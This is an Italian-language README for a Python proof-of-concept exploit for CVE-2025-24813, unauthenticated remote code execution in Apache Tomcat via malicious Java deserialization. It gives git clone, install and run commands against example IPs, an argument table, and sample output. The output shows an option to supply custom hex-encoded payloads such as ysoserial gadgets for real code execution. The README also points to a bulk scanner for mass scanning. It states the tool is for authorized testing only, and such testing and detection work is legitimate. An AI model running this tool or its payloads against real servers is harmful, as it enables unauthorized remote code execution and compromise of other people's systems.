
Un exploit proof-of-concept in Python per CVE-2025-24813 - RCE non autenticato in Apache Tomcat (v9.0.0-9.0.98/10.1.0-10.1.34/11.0.0-11.0.2) tramite deserializzazione maliziosa di oggetti Java. Include modalità di rilevamento sicura e supporto per payload personalizzati.
Un exploit proof-of-concept per la vulnerabilità di deserializzazione di Apache Tomcat (CVE-2025-24813). Questo strumento dimostra come gli attaccanti potrebbero sfruttare la deserializzazione insicura nella gestione delle sessioni di Tomcat.
ATTENZIONE: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi educativi. L'uso non autorizzato contro sistemi di cui non si è proprietari è illegale.
requestscoloramagit clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt
Utilizzo base:
python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080
Opzioni avanzate:
python CVE-2025-24813-PoC.py \
-t 10.0.0.1 \
-p 8443 \
--protocol https \
--no-verify \
--timeout 15
| Argomento | Descrizione | Obbligatorio |
|---|---|---|
-t, --target | Indirizzo IP del target | Sì |
-p, --port | Numero di porta del target | Sì |
--protocol | http o https (default: http) | No |
--no-verify | Disabilita la verifica del certificato SSL | No |
--timeout | Timeout della richiesta in secondi (default: 10) | No |
[*] Apache Tomcat CVE-2025-24813 Exploit PoC
[!] WARNING: For authorized testing only. Unauthorized use is illegal.
[*] Targeting http://192.168.1.100:8080
[*] Payload Options:
1. Use default dummy payload (safe, for detection)
2. Enter custom payload (hex-encoded, e.g., from ysoserial)
[?] Enter choice (1 or 2): 1
[*] Using default dummy payload.
[*] Attempting exploit...
[+] Success: Deserialization triggered (HTTP 500). Potential RCE if payload is malicious!
Per scansioni massive di sistemi vulnerabili:
🔍 CVE-2025-24813-Scanner - Strumento di rilevamento bulk per host Tomcat vulnerabili
Se sei affetto da questa vulnerabilità:
Questo software è fornito sotto licenza MIT. L'autore non è responsabile per qualsiasi uso improprio di questo strumento. Ottieni sempre la dovuta autorizzazione prima di testare i sistemi.
Licenza MIT - Vedi il file LICENSE per i dettagli.